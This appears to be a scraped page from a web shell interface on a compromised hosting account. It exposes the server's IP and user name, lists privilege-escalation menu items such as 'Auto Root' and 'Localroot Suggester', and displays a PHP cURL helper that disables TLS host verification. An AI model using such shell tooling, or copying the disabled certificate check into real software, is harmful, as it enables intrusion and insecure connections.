Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
siba91 /
core /
app /
Lib /
Delete
Unzip
Name
Size
Permission
Date
Action
Captcha.php
3.58
KB
-rw-r--r--
2023-11-03 02:38
ClientInfo.php
2.77
KB
-rw-r--r--
2023-11-03 02:38
CurlRequest.php
1.15
KB
-rw-r--r--
2023-11-03 02:38
FileManager.php
5.52
KB
-rw-r--r--
2023-11-03 02:38
FormProcessor.php
4.58
KB
-rw-r--r--
2023-11-03 02:38
GoogleAuthenticator.php
6.03
KB
-rw-r--r--
2023-11-03 02:38
HyipLab.php
6.89
KB
-rw-r--r--
2023-11-03 02:38
Initials.php
974
B
-rw-r--r--
2023-11-03 02:38
Save
Rename
<?php namespace App\Lib; class CurlRequest { /** * GET request using curl * * @return mixed */ public static function curlContent($url,$header = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); if ($header) { curl_setopt($ch, CURLOPT_HTTPHEADER, $header); } curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); return $result; } /** * POST request using curl * * @return mixed */ public static function curlPostContent($url, $postData = null,$header = null) { if (is_array($postData)) { $params = http_build_query($postData); } else { $params = $postData; } $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); if ($header) { curl_setopt($ch, CURLOPT_HTTPHEADER, $header); } curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); return $result; } }